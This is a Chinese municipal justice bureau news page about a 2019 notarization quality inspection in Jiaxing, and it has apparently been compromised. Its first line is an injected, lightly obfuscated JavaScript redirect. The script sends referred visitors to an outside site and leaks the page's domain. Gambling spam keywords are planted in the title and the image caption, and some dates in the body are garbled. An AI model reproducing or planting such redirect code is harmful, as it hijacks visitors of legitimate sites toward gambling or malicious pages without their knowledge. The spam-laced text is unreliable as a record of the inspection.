var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 律师管理·公证管理
发布日期:2019-10-23 浏览次数: 字号:[ ]

为进一步提高公证质量,抓好公证质量源头治理,强化公证质量监管和执业风险防范,根据省司法厅《关于组织开展2019年度全省公证质量专项检查活动的通知》精神,近日,嘉兴市开展2019年度公证质量专项检查活动。

本次专项检查在各公证处自查基础上开展,集中检查201871日至2019630日期间,各公证处办理的涉外公证、委托公证和民事类合同(协议)公证约350卷。重点检查公证机构对公证事项是否进行实质性审查把关,出具的公证书是否规范等内容,并最终形成书面检查报告。

1571795975929_2019.10.21bbin宝盈,bbin下载:公证处对海盐公证处开展案卷检查1.jpg

 市局公共法律服务管理处

                    




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统